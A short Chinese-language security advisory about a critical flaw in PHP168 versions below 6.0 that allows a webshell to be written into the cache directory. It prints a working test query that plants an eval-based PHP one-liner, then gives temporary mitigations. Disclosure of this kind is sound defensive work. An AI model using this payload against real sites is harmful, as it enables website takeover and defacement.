最近PHP168的最新漏洞 危险等级:极高
漏洞测试版本:PHP168 6.0以下版本
由于php过滤不严导致,入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句: ?makehtml=1&chdb[htmlname]=hack.php&chdb[path]=cache&content=?php%20@eval($_POST[hack]);?>
目前该漏洞入侵动画已经在互联网发布出来,该漏洞造成很多网站已经遭挂马或者入侵。如果您的网站系统是php168或者此类版本,请立即检查网站cache目录下是否已经写入木马。 目前官方还未公布漏洞补丁,黑基网提供临时解决方案:
1. 请您修改根目录下的login.php文件名
2.如果实在怕被再次入侵可以考虑设置cache目录无脚本执行权限来临时阻止此漏洞的侵袭。 |